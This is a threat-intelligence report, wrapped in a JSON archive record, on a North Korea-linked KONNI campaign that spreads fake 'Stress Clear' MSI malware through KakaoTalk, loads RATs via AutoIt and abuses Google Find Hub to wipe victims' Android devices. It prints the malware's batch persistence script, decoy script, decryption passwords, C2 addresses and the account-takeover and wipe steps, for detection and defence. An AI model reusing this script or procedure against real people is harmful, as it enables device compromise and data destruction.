{ "id": "5031e989-a36f-415c-a1be-a05a579bd8fe", "created_at": "2026-04-06T00:18:27.738935Z", "updated_at": "2026-04-10T03:37:40.970479Z", "deleted_at": null, "sha1_hash": "d0a0a5f2b671b004318874f8d2683e3ce5bd42f3", "title": "State-Sponsored Remote Wipe Tactics Targeting Android Devices", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5736439, "plain_text": "State-Sponsored Remote Wipe Tactics Targeting Android Devices\r\nBy Genians\r\nPublished: 2025-11-09 · Archived: 2026-04-05 20:49:11 UTC\r\n◈ Key Findings\r\nEmergence of an Android remote data-wipe attack exploiting Google’s asset-tracking feature, Find Hub.\r\nIdentified as a follow-up attack of the KONNI APT campaign, which had operated covertly for nearly a\r\nyear.\r\nAttackers impersonated psychological counselors and North Korean human rights activists, distributing\r\nmalware disguised as stress-relief programs.\r\nMalicious files were delivered through the KakaoTalk messenger, leveraging impersonation of\r\nacquaintances to conduct trust-based attacks.\r\nStrengthening real-time behavior-based detection and IOC-linked monitoring through EDR solutions is\r\nstrongly recommended.\r\n1. Overview\r\nThe Genians Security Center (GSC) has identified new attack activity linked to the KONNI APT campaign, which\r\nis known to be associated with the Kimsuky or APT37 groups.\r\nDuring its ongoing investigation into KONNI’s operations, GSC discovered that malicious files disguised as\r\n“stress-relief programs” were being widely distributed through South Korea’s KakaoTalk messenger platform.\r\nKONNI has overlapping targets and infrastructure with Kimsuky and APT37, leading some researchers to classify\r\nthem as the same group. All three are recognized as state-sponsored threat actors operating under the direction of\r\nthe North Korean regime.\r\nMeanwhile, on October 22, 2025, the Multilateral Sanctions Monitoring Team (MSMT) released a report titled\r\n“Activities of the DPRK’s Cyber and IT Workers” and adopted a joint statement. MSMT, established under UN\r\nSecurity Council (UNSC) resolutions, is a multilateral body that monitors and reports on violations and evasion of\r\nsanctions measures to the international community.\r\nAccording to the MSMT report, Kimsuky and KONNI are assessed as distinct groups associated with the 63\r\nResearch Center, with close connections to North Korean cyber operators and IT workers designated under UN\r\nsanctions.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 1 of 29\n\n[Figure 1-1] Kimsuky and KONNI Groups under the 63 Research Center (Source: MSMT)\r\nThe recently identified KONNI campaign is particularly notable for cases in which Google Android–based\r\nsmartphones and tablet PCs in South Korea were remotely reset, resulting in the unauthorized deletion of\r\npersonal data stored on the devices.\r\nThe Google “Find Hub” service, which is provided to protect lost or stolen Android devices, was abused in data-destructive attacks. While Find Hub is intended to safeguard Android devices, this is the first confirmed case in\r\nwhich a state-sponsored threat actor obtained remote control by compromising Google accounts, then used the\r\nservice to perform location tracking and remote wipe. This development demonstrates a realistic risk that the\r\nfeature can be abused within APT campaigns.\r\nThis report aims to identify the first known attack tactic in which a state-sponsored threat group linked to North\r\nKorea compromised Find Hub accounts and abused legitimate management functions to remotely reset mobile\r\ndevices. It also analyzes a chained scenario in which the attacker leveraged victims’ KakaoTalk PC sessions to\r\ndistribute malicious files to close contacts, and provides response measures and intelligence insights for similar\r\nthreats.\r\n2. Background\r\nIn late July of last year, the Genians Security Center (GSC) released a report titled “Analysis of defense evasion\r\ntactics using AutoIt in the KONNI APT campaign.”\r\nAccording to the attack scenario analyzed at that time, the threat actors designed and executed attacks using social\r\nengineering themes such as Korean National Tax Service documents and scholarship application forms for North\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 2 of 29\n\nKorean defectors.\r\nAnalysis of defense evasion tactics using AutoIt in the KONNI APT campaign\r\nThe malicious scripts installed by the attack remain stealthily resident on victim systems and can lie dormant for\r\nextended periods. During this time they monitor system state and make internal changes to ensure persistence.\r\nThey also communicate with multiple C2 servers to stealthily install additional malicious modules, allowing the\r\nthreat actors to monitor and control system activity in near real time.\r\n[Figure 2-1] Attack flowchart\r\nIf behavior-based anomaly detection such as EDR is absent, threat actors can remain resident on compromised\r\nendpoints for long periods, harvesting user data and conducting covert surveillance via webcams.\r\nIn this process, the access obtained during the initial intrusion enables system control and additional information\r\ncollection, while evasion tactics allow long-term concealment.\r\nState-sponsored threat actors can exploit the webcam to covertly monitor the user’s surroundings or identify\r\nperiods of absence and carry out follow-on attacks.\r\nIn particular, when the webcam has a built-in microphone, it can capture audio as well as video, significantly\r\nexpanding the scope of privacy violations.\r\nWebcams without activity LEDs make it difficult for users to notice that a video stream is active, increasing the\r\nlikelihood of undetected monitoring and therefore the overall security risk.\r\nIf the victim’s system is online and the webcam is active while the user is away, the threat actor can verify the\r\nabsence and execute remote operations with minimal risk of immediate detection.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 3 of 29\n\nAdditionally, by using the stolen Google account credentials and Find Hub’s management functions, the actor\r\ntracks the victim’s real-time location (GPS coordinates) and repeatedly triggers remote resets to delete personal\r\ndata on Android devices, disrupting normal use.\r\nAs a result, victims may have difficulty receiving important contacts and notification messages on their mobile\r\ndevices, and the threat actors can sustain prolonged, persistent attacks over time.\r\nTo enhance security, it is recommended to use webcams with indicator light and to physically cover the camera\r\nlens when not in use.\r\nIn addition, users should use built-in hardware mute functions and strictly control camera and microphone access\r\npermissions within the operating system and installed applications.\r\nFurthermore, the following additional security measures should be reviewed and implemented to reinforce\r\nsecurity policies against similar threats.\r\nAccount Security Hardening\r\nChange Google account password regularly and enable additional authentication methods such as\r\n2-factor authentication (2FA) to protect against credential exposure.\r\nWhen leaving, power off the computer to minimize the risk of physical or remote attacks.\r\nProtecting the Find Hub Service\r\nTo prevent the unauthorized abuse of remote wipe features through compromised Google accounts,\r\nservice providers should review and implement real-time security verification measures, such as\r\nadditional authentication processes that confirm the legitimate device owner.\r\nUpon receiving a remote reset command, the device does not reset immediately. It switches to a\r\nlocked screen, applies a short delay, and notifies the owner via a smartphone push alert.\r\nAccordingly, it is recommended to implement a security procedure that clearly verifies whether the\r\nremote wipe request has been made by the legitimate device owner before execution, through multi-factor authentication such as facial recognition, fingerprint verification, or PIN entry.\r\nStrengthening Messenger File Security and User Awareness\r\nReinforce verification of files received via messenger platforms before opening or execution.\r\nUse clear warning prompts to help users avoid downloading or running malicious files, and\r\ncontinuously reinforce security awareness.\r\n3. Attack Progression\r\n3-1. Initial Access\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 4 of 29\n\nThe threat actors infiltrated specific individuals’ devices through spear-phishing that spoofed organizations such as\r\nthe National Tax Service, then conducted internal reconnaissance and information collection for a prolonged\r\nperiod. Among the victims was a professional psychological counselor who supports North Korean defector\r\nyouths during resettlement by addressing psychological difficulties and providing services such as career\r\nguidance, educational counseling, and mentoring to help stabilize their well-being.\r\nAnother victim opened an email impersonating the National Tax Service and executed the attached malicious file.\r\nAfter receiving a follow-up message stating it had been sent by mistake, the victim dismissed the incident.\r\nThese cases illustrate how crafty and persistent spear-phishing techniques can be in deceiving victims and\r\nunderscore the need for heightened vigilance.\r\n[Figure 3-1] Screen impersonating an “email delivery error notice”\r\nIn addition, multiple cases were identified in which malware distributed through National Tax Service\r\nimpersonation was executed on victims' systems. Various artifacts were identified, including the download history\r\nof \"Guidance on submitting explanatory materials pursuant to a tax-evasion report.zip,\" which enabled a detailed\r\ntrace of the attackers’ initial intrusion procedure.\r\n3-2. Attack Scenario\r\nThis report presents the findings of an in-depth examination and digital forensic analysis of selected victim\r\ndevices exposed to spear-phishing attacks impersonating the National Tax Service. The analysis confirmed that the\r\ncompromised devices did not remain first-stage victims only; they were converted into components of the\r\nattackers’ infrastructure and abused as relays to propagate secondary malicious files via KakaoTalk.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 5 of 29\n\nThese findings show that the attackers deliberately targeted services built on social trust to amplify their impact,\r\nreflecting more advanced tactics and increasingly sophisticated methods of concealment.\r\n[Figure 3-2] Cases of malicious file distribution via KakaoTalk\r\nThe investigation found that on the morning of September 5 a threat actor compromised and abused the\r\nKakaoTalk account of a South Korea–based counselor who specializes in psychological support for North Korean\r\ndefector youth, and sent a malicious file disguised as a “stress relief program” to an actual defector student.\r\nExecution of the file resulted in infections on several devices, and subsequent remediation measures were\r\nimplemented.\r\nJust ten days later, on September 15, a separate victim’s KakaoTalk account was used to distribute malicious files\r\nen masse in a simultaneous wave.\r\nThis campaign is assessed as a typical social-engineering attack that leveraged trust-based communications to\r\nprecisely exploit the target’s psychological and social context. In particular, the compromise of messenger\r\naccounts and their use as a secondary attack vector increased the attack’s level of customization while expanding\r\nits attack surface and propagation scope, thereby amplifying the threat.\r\nA notable finding is that immediately after confirming through Find Hub’s location query that the victim was\r\noutside, the threat actor executed a remote reset command on the victim’s Android devices (smartphone and\r\ntablet). The remote reset halted normal device operation, blocking notification and message alerts from messenger\r\napplications and effectively cutting off the account owner’s awareness channel, thereby delaying detection and\r\nresponse. \r\nThe attacker then exploited the compromised KakaoTalk account as a secondary distribution channel, rapidly\r\nspreading the malicious files immediately after the remote reset, achieving both concealment and propagation at\r\nthe same time.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 6 of 29\n\nThis combination of device neutralization and account-based propagation is unprecedented among\r\npreviously known state-sponsored APT scenarios and was first identified and analyzed in this report. It\r\ndemonstrates the attacker’s tactical maturity and advanced evasion strategy, marking a key inflection point\r\nin the evolution of APT tactics.\r\n3-3. Remote Interference with Devices\r\nThe threat actor who achieved initial access conducted prolonged internal reconnaissance and remote monitoring,\r\nduring which they collected and exfiltrated the victim’s sensitive information and key account credentials,\r\nultimately gaining access to Google and Naver accounts.\r\nUsing the stolen credentials, the attacker took control of the accounts and misused Find Hub’s management\r\nfeatures to execute destructive actions, such as remotely wiping mobile devices. Digital forensic and artifact\r\nanalysis identified the attacker’s access addresses, which were organized in chronological order after removing\r\nduplicates, as follows.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 7 of 29\n\n[Figure 3-3] Log of remote reset operations by timestamp \r\nThe threat actor first logged into the victim’s Gmail account and checked recent login session records on the\r\nAccount Activity Details page.\r\nNext, they accessed the Google Account Management page, opened the Security menu, and confirmed the\r\nrecovery email address registered under a Naver account. The attacker then logged into that Naver account,\r\ndeleted Google’s security alert emails, and emptied the trash folder, taking deliberate steps to remove traces of\r\ntheir activity.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 8 of 29\n\nAfterward, the attacker opened Google’s Security menu, went to the Your devices section, and selected the Find\r\nMy Phone link. From there, selecting a registered smartphone or tablet redirected them to the Find Hub service,\r\nwhich allows various remote commands to be executed on the linked devices.\r\n[Figure 3-4] Examples of smartphones and tablets registered in Find Hub\r\nThe threat actor executed remote reset commands on the registered Android-based smartphones and tablets.\r\nDuring this process, the attacker re-entered the Google account password to proceed with the device wipe action,\r\nwhich was successfully carried out, resulting in the complete deletion of critical data stored on the affected\r\ndevices.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 9 of 29\n\n[Figure 3-5] Execution of the device reset command\r\nEven after the device reset was completed, the threat actor repeatedly sent the same remote reset command more\r\nthan three times, disrupting and delaying the normal recovery and use of the targeted smart devices for an\r\nextended period, which rendered the affected devices unavailable for normal use. At that point, the attacker\r\naccessed the victim’s logged-in KakaoTalk PC version and used it as a channel to distribute malicious files.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 10 of 29\n\n[Figure 3-6] Device reset and subsequent attack\r\nAs a result of this APT attack, the victim suffered not only information theft but also severe damage across\r\nmultiple devices.\r\nPersonal and Sensitive Data Leak\r\nThe threat actor gained unauthorized access to the victim’s PC and stole a large volume of\r\npersonally identifiable information (PII), sensitive data, and private content captured through the\r\nwebcam.\r\nMobile Device Data Destruction\r\nThe victim’s smartphone and tablet received multiple remote reset commands from the compromised\r\naccount, resulting in a complete deletion of stored data through factory reset and remote wipe\r\nactions.\r\nAccount Compromise and Secondary Propagation\r\nThe threat actor gained unauthorized access through the victim’s active messenger session\r\ncredentials and used the compromised account as a channel to distribute malware.\r\n[Video 3-1] Initialization demonstration\r\n4. In-depth Analysis\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 11 of 29\n\n4-1. MSI Malware Analysis\r\nAll samples of the \"Stress Clear.zip\" files distributed via KakaoTalk messages were found to share the same\r\nstructure. The archive contains a Microsoft Installer (MSI) package disguised as \"Stress Clear.msi.\"\r\nThe MSI contains a valid digital signature issued to \"Chengdu Hechenyingjia Mining Partnership Enterprise\" in\r\nChina. This represents an abuse of code signing: the attacker used a legitimate-looking signature to disguise the\r\nfile’s origin and integrity, making it appear like a legitimate application.\r\n[Figure 4-1] Internal structure of 'Stress Clear.msi'\r\nThe 'Stress Clear.msi' file runs only on Windows operating systems and is not executable on non-compatible\r\nplatforms such as smartphones, so those devices are not infection targets. When executed in a compatible\r\nenvironment, the standard MSI installation GUI appears, while malicious actions embedded in the installation\r\nroutine are performed without the user’s awareness.\r\nWhen the malicious MSI runs, it sequentially invokes the included install.bat batch file and error.vbs script\r\naccording to the ActionID values.\r\nThe overall execution flow is roughly as follows. Note that although the package contains some legitimate\r\nfinancial security modules, these do not affect the malicious behavior.\r\nInitial execution\r\nWhen the MSI installer runs, it calls the embedded install.bat, which performs initial setup and then\r\ndeploys payloads sequentially, such as copying malicious files and registering scheduled tasks.\r\nControl branching\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 12 of 29\n\nDepending on the internal ActionID values, the MSI invokes the error.vbs script.\r\nConcealment actions\r\nThe error.vbs script displays a fake error dialog (for example, a language pack error) to the user.\r\nThis decoy message is designed to make the user mistake the installation behavior for a normal\r\nerror, thereby hiding the malicious activity and delaying detection.\r\nThe messages shown to the user are a Korean installation prompt for the “스트레스 클리어”(Stress Clear)\r\nprogram and a fake error dialog that claims a language-pack compatibility issue.\r\n[Figure 4-2] Screens displayed during malicious file execution\r\nThe specific commands executed are as follows:\r\n%SystemRoot%\\system32\\cmd.exe /c\r\n%APPDATA%\\스트레스 클리어\\install.bat\r\n@echo off\r\nset dr=Music\r\ncopy \"%~dp0AutoIt3.exe\" %public%\\%dr%\\AutoIt3.exe\r\ncopy \"%~dp0IoKlTr.au3\" %public%\\%dr%\\IoKlTr.au3\r\ncd /d %public%\\%dr% \u0026 copy c:\\windows\\system32\\schtasks.exe hwpviewer.exe \u0026 hwpviewer /delete /tn\r\n\"IoKlTr\" /f \u0026 hwpviewer /create /sc minute /mo 1 /tn \"IoKlTr\" /tr \"%public%\\%dr%\\AutoIt3.exe\r\n%public%\\%dr%\\IoKlTr.au3\"\r\ndel /f /q \"%~dp0AutoIt3.exe\"\r\ndel /f /q \"%~dp0IoKlTr.au3\"\r\ndel /f /q \"%~f0\"\r\n[Table 4-1] Commands in the install.bat Script\r\nThe BAT file copies \"AutoIt3.exe\" and the \"IoKlTr.au3\" script to the public Music folder (\"%PUBLIC%\\Music\").\r\nNext, it makes a copy of the original Task Scheduler Configuration Tool executable \"schtasks.exe\" and renames it\r\nto \"hwpviewer.exe\".\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 13 of 29\n\nNext, it creates a scheduled task set to run every minute to continuously execute the malicious AutoIt script.\r\nFinally, it deletes the original batch file and source files to minimize traces. These actions are typical for\r\nestablishing persistence and concealing evidence, including self-deletion, removal of source artifacts, and\r\nmasquerading as a document viewer.\r\n%SystemRoot%\\System32\\WScript.exe\r\n%APPDATA%\\스트레스 클리어\\error.vbs \r\nMsgBox \"현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다.\" \u003cThis program\r\ncannot run because the current system language pack is incompatible with the program’s language pack.\u003e \u0026\r\nvbCrLf \u0026 _\r\n       \"설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.\"\u003cIn Settings, install\r\nor switch to the Korean (Republic of Korea) language pack, then run the program again.\u003e, _\r\n       vbCritical, \"언어팩 오류\"\u003cLanguage Pack Error\u003e\r\nㅊ[Table 4-2] error.vbs Script Command\r\nThe VBS script displays a warning dialog titled \"Language Pack Error.\" The code itself contains no malicious\r\nbehavior; it is used as a decoy message to make the program appear nonfunctional and mislead the user.\r\n4-2. AutoIt Script Analysis\r\nThe AutoIt script \"IoKlTr.au3,\" which is run periodically by Task Scheduler, is a core component designed to\r\nperform persistent malicious activity on the system.\r\nThe script is loaded at regular intervals to execute additional commands and to maintain or update the malicious\r\npayload.\r\nIt also conceals its malicious logic by inserting unnecessary code at the beginning and end of the script that is\r\nunrelated to the actual execution flow, in order to hinder detection and analysis.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 14 of 29\n\n[Figure 4-3] Internal code of the compiled AutoIt script\r\nA review of the internal code shows that the file has the structure of a compiled AutoIt script, and that the actual\r\ncommands can be restored and verified through decompilation. For detailed analysis, see the previously\r\nreferenced report, \"Analysis of defense evasion tactics using AutoIt in the KONNI APT campaign.\"\r\nThe target code is similar to the AutoIt-based LilithRAT but in a modified form that uses the \"endClient9688\"\r\nJSON marker, and its command-and-control (C2) connection is made through a Germany-based domain. The\r\ndomain is built on WordPress and currently displays a maintenance notice.  For this reason, it is also classified as\r\nEndRAT.\r\nC2\r\n116.202.99[.]218\r\nbp-analytics[.]de\r\nMutex\r\nGlobal\\AB732E15-D8DD-87A1-7464-CE6698819E701\r\nStartupDir\r\nSmart_Web.lnk\r\nIn similar past campaigns, multiple C2 servers were hosted on WordPress. We assess that the actor repeatedly\r\nabused WordPress-based web servers, which are more likely to have security weaknesses.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 15 of 29\n\n[Figure 4-4] Decompiled script\r\nAs part of the attack technique, a mutex is used to prevent duplicate execution, and a malicious shortcut file (.lnk)\r\nis registered in Startup so it launches automatically after a system restart. These files are distributed with minor\r\nvariations.\r\nIn previous cases, the shortcut was named \"Start_Web.lnk,\" whereas in this case it was changed to\r\n\"Smart_Web.lnk.\"\r\n5. Incident Investigation\r\n5-1. Digital Forensics\r\nFollowing the Digital Forensics and Incident Response (DFIR) process, we collected multiple additional pieces of\r\nevidence. For reference, DFIR generally proceeds as follows:\r\nPreparation\r\nPlan the response, prepare tools and the team.\r\nDetection \u0026 Identification\r\nDetect anomalies and confirm whether an incident has occurred.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 16 of 29\n\nContainment \u0026 Response\r\nPrevent further spread and take initial response actions.\r\nAnalysis\r\nAnalyze logs, systems, and malware to determine the attack path and root cause.\r\nRecovery\r\nRestore operations, remediate damage, and restore data.\r\nPost-Incident Reporting\r\nPrepare the incident report and develop a plan to prevent recurrence.\r\n5-2. Digital Evidence Collection and Analysis\r\nOn September 5, 2025, we conducted a digital forensic examination of several victims’ PCs that had downloaded\r\nand executed an MSI file distributed via KakaoTalk Messenger.\r\nThe investigation indicated that multiple additional malicious files had been installed on the systems, prompting\r\nevidence collection.\r\nThe collected artifacts were used for in-depth analysis to identify malware types and determine the scope of\r\ncompromise.\r\n[Figure 5-1] Collecting additional malicious files\r\nMultiple malicious files were identified on the victim’s device, assessed to have been additionally downloaded via\r\nthe C2 server.\r\nAnalysis shows that these files contain malicious AutoIt scripts and modules that enable remote access and\r\nkeylogging.\r\nThe threat actor concealed various malware components by encoding or encrypting them within AutoIt scripts.\r\nThis technique is assessed as a strategy to evade security product detection and delay analysis of malicious\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 17 of 29\n\nactivity.\r\n6. Threat Attribution\r\n6-1. MSI-Based Strategy\r\nIn early April, the Genians Security Center (GSC) published a detailed report titled \"Analysis of KONNI APT\r\nCampaign Disguised as Korean National Police Agency and National Human Rights Commission.\"\r\nAnalysis of KONNI APT Campaign Disguised as Korean National Police Agency and National\r\nHuman Rights Commission\r\nIn the spear-phishing attack that impersonated a police investigator, multiple North Korean expressions were\r\nidentified. For example, \"incha\" means \"soon\" or \"immediately\" and is used to indicate that an action is imminent.\r\nIn addition, \"taegong\" was confirmed as a North Korean expression meaning \"slacking off at work.\"\r\nThreat actors strive to minimize exposure of their native language, yet habitual expressions can surface\r\nunconsciously. These linguistic traces can serve as important clues for assessing a threat actor’s nationality or\r\noperating region and for conducting attribution analysis of the attack group.\r\nIn the police-impersonation attack, a malicious file named \"악성코드 진단(멀웨어 제로) - 설치 파\r\n일.msi(Malware Detection (Malware Zero) - Installer.msi)\" was used. This file registered the \"IoKlTr.au3\" script\r\nwith Task Scheduler so that it could run automatically at regular intervals.\r\nMeanwhile, in the \"Stress Clear.msi\" file delivered via KakaoTalk, the same \"IoKlTr.au3\" script was used,\r\nindicating that similar tactics and techniques were employed across the two attacks.\r\n악성코드 진단(멀웨어 제로) - 설치 파일.msi\r\nIoKlTr.au3\r\nStress Clear.msi\r\nIoKlTr.au3\r\nAdditionally, each MSI file was built using EMCO Software’s MSI Package Builder (versions 11.2.6 and 11.2.8).\r\n \r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 18 of 29\n\n[Figure 6-1] Version comparison of MSI Package Builder\r\n6-2. Attack Weapon Path\r\nThe threat actor used an AutoIt script to launch RemcosRAT (Remote Access Trojan).\r\nRemcosRAT has been continually updated since its initial 1.0 release in July 2016. As of September 2025, the\r\nlatest version is 7.0.4. Because it is sold commercially, threat actors can easily obtain and use it in attacks.\r\nOn some victims’ systems, RemcosRAT 7.0.4 Pro was identified, indicating that the attackers were actively using\r\nthe latest malware and tactics.\r\n[Figure 6-2] Internal strings of the AutoIt script\r\nAnalysis of the collected AutoIt scripts identified parts of the internal folder structure, which is assessed as a\r\nmeaningful clue for tracing the attack infrastructure and development environment.\r\nAdditionally, naming the path used for development \"Attack Weapon\" suggests that the threat actor intended to\r\ndevelop a cyberattack weapon and an operational plan.\r\nD:\\3_Attack Weapon\\Autoit\\Build\\\r\nRemcos\\RunBinary.a3x\r\nThis folder structure matches the paths referenced in the previously cited report, \"Analysis of defense evasion\r\ntactics using AutoIt in the KONNI APT campaign.\"\r\nD:\\3_Attack Weapon\\Autoit\\Build\\\r\nLilith\\Lilith.a3x\r\nFor reference, in a malicious file distributed on October 23, 2025, under the guise of the National Tax Service’s\r\n\"Request for Submission of Materials to Explain Unreported Source of Funds,\" the following path was\r\nadditionally identified.\r\nD:\\3_Attack Weapon\\Autoit\\Build\\\r\n__Poseidon - Attack\\client3.3.14.a3x\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 19 of 29\n\n6-3. RAT Correlation Analysis\r\nOn the victims’ devices, in addition to LilithRAT and RemcosRAT, various RAT module variants hidden within\r\nAutoIt scripts were identified. The representative types are as follows.\r\nQuasarRAT\r\nsqlite3.au3\r\nRftRAT\r\ncliconfg.au3\r\nThese files were received from the C2 and created in subdirectories of the \"%APPDATA%\\Google\\Browser\"\r\ndirectory whose names contain \"adb\" or \"adv.\" The received scripts \"autoit.vbs\" and \"install.bat\" then perform\r\nAutoIt-based execution from those locations.\r\nThe script \"sqlite3.au3\" contains the directive \"#AutoIt3Wrapper_Outfile_type=a3x,\" indicating it was built via\r\nthe compiler wrapper.\r\nThis script derives an AES decryption key through an HMAC-based process and uses it to decrypt an AES-encrypted payload.\r\nThe decrypted module is the C# \"QuasarRAT,\" which is injected into the \"hncfinder.exe\" process. The password\r\nstring used in this process is as follows.\r\nxPabyrwTaOczVwegVMgzmEpq\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 20 of 29\n\n[Figure 6-3] Decoding process of \"sqlite3.au3\"\r\nAnalysis shows that QuasarRAT attempts to communicate with a Netherlands-based C2 server at 212.118.52[.]168\r\nand maintains a persistent connection to receive subsequent commands. For reference, the Quasar project was\r\ninitially released under the name \"xRAT.\" GitHub history indicates that around August 2015, with the v1.0.0.0\r\nrelease, the name was changed to \"Quasar.\"\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 21 of 29\n\n[Figure 6-4] Analysis of QuasarRAT C2 server address\r\nNext, the \"cliconfg.au3\" script also includes the directive \"#AutoIt3Wrapper_Outfile_type=a3x.\"\r\nLike \"sqlite3.au3,\" this script performs HMAC-based hash derivation to generate an AES decryption key and uses\r\nthat key to decrypt an AES-encrypted payload.\r\nThe decrypted execution module is classified as RFTServer (commonly referred to as RftRAT) and is injected into\r\nthe \"cleanmgr.exe\" process. The password string used in this process is as follows.\r\nBFigyOed7KVjU993ZCJzYb8R\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 22 of 29\n\n[Figure 6-5] Decoding \"cliconfg.au3\"\r\nAnalysis shows that RftRAT attempts to communicate with a Japan-based C2 server at 38.180.148[.]108 and\r\nmaintains a persistent connection to receive subsequent commands.\r\nRftRAT uses simple arithmetic (subtractive) obfuscation rather than complex encryption, hiding the actual C2\r\nserver address by using the data string as a key.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 23 of 29\n\n[Figure 6-6] Analysis of RftRAT C2 server addresses\r\nAccording to previously published analyses by Genians and AhnLab, RftRAT has been used in persistent and\r\ncovert threat campaigns targeting South Korea.\r\nKimsuky group using AutoIt to build malware (RftRAT, Amadey)\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 24 of 29\n\nRftRAT is rarely covered in global threat analysis reports. This suggests that the malware is tailored to Korea-focused operations and that obtaining relevant data and conducting in-depth analysis require substantial effort.\r\n6-4. Threat Infrastructure Correlation\r\nCross-correlating IOCs from victims’ devices and similar malware indicates a strong link pointing to a single\r\nKONNI campaign.\r\n[Figure 6-7] Threat infrastructure relationship diagram\r\nThe threat actor abused WordPress-based hosting as staging infrastructure and operated primary C2 nodes hosted\r\nin Russia, the United States, and Germany.\r\nThey also placed RAT-layer relay nodes on third-country servers, including Japan and the Netherlands, using\r\ngeographic distribution and multi-stage relays to evade or delay law-enforcement log and source-IP tracing.\r\n7. Conclusion\r\nWhen the malicious MSI file runs, the embedded batch file \"install.bat\" is automatically invoked to execute\r\nfollow-on commands. Genian EDR event analysis shows that this script copies the \"AutoIt3.exe\" executable and\r\nthe \"IoKlTr.au3\" script to the public Music folder at \"C:\\Users\\Public\\Music.\"\r\nThese actions are recorded in the EDR as events such as \"CreateProcess,\" \"FileCreate,\" and \"FileWrite,\" enabling\r\ntimeline-based activity tracing. Using these event logs, an analyst can reconstruct the execution chain from the\r\nMSI launch through the batch file execution to the file copies.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 25 of 29\n\n[Figure 7-1] Genian EDR Threat Management screen\r\nA malicious MSI file is executed by the “MsiExec.exe” process, which creates the  files contained in the package\r\nand invokes batch files such as \"install.bat\" to run malicious scripts.\r\nThis entire execution flow can be quickly identified by reviewing EDR command-line event logs, allowing\r\nsecurity administrators to detect and respond at an early stage.\r\n[Figure 7-2] MsiExec.exe command line\r\nTracing the AutoIt process’s execution path and behavior enables quick identification of the shortcut\r\n\"Smart_Web.lnk\" used for persistence and its target path.\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 26 of 29\n\nIn addition, process logs allow identification of the C2 IPs and domains the sample contacts. Using this\r\ninformation enables rapid deployment of firewall rules to block data exfiltration, EDR blocking rules, or network\r\nsegmentation policies.\r\n[Figure 7-3] Genian EDR Attack Storyline\r\nThe attack storyline of Genian EDR visualizes the entire execution flow in a timeline and relational view, enabling\r\nSOC operators to see process trees, command lines, files, registry, and network events at a glance and immediately\r\nexecute prioritization, isolation, blocking, and forensic collection.\r\nThe EDR collects and analyzes all endpoint activity in real time, visualizes the full sequence of malicious\r\nbehavior, rapidly contains attack propagation with automated response, helping enterprises and public institutions\r\nrespond effectively to security threats.\r\nForensic analysis combined with threat intelligence enables root-cause determination, recurrence prevention, and\r\nthe blocking of internal data exfiltration, supporting a comprehensive security management framework. Given that\r\nmany threats now evade traditional antivirus and firewalls, adopting EDR is essential.\r\n8. Indicator of Compromise\r\nMD5\r\n5ab26df9c161a6c5f0497fde381d7fca\r\n8f82226b2f24d470c02f6664f67f23f7\r\n09b91626507a62121a4bdb08debb3ed9\r\n25e38d618f38b3218c3252cf0d22c969\r\n38f8fd9e8d27ae665b3ac0f56492f6c4\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 27 of 29\n\n048e1698c4b711d1652df4bf4be04f9e\r\n53aea290d7245ee902a808fd87a6a173\r\n56c7b448dbc37aa50eb1c2a6475aca5e\r\n99ee7852b8041a540fdb74b3784d0409\r\n8230af6642f5f1927bbbbc7fd6e5427f\r\nb0eba111b570bb1c93ca1f48557d265b\r\nef1a8f66351d03413ed2c7d499ee5164\r\nf7363c5cfd6fa24a86e542fcd05283e8\r\nf6800836d55d049fe79e3d47d54e1119\r\nDomain\r\nappoitment.dotoit[.]media\r\ngenuinashop[.]com\r\noldfoxcompany[.]com\r\nprofessionaltutors[.]net\r\nsparkwebsolutions[.]space\r\nxcellentrenovations[.]com\r\nyoukhanhdoit[.]co\r\nIP\r\n116.202.99[.]218\r\n192.109.119[.]113\r\n212.118.52[.]168\r\n38.180.148[.]108\r\n62.113.118[.]157\r\n77.246.101[.]72\r\n77.246.108[.]96\r\n89.110.83[.]245\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 28 of 29\n\n91.107.208[.]93\r\n93.183.93[.]185\r\n94.103.87[.]212\r\n109.234.36[.]135\r\nSource: https://www.genians.co.kr/en/blog/threat_intelligence/android\r\nhttps://www.genians.co.kr/en/blog/threat_intelligence/android\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.genians.co.kr/en/blog/threat_intelligence/android" ], "report_names": [ "android" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", 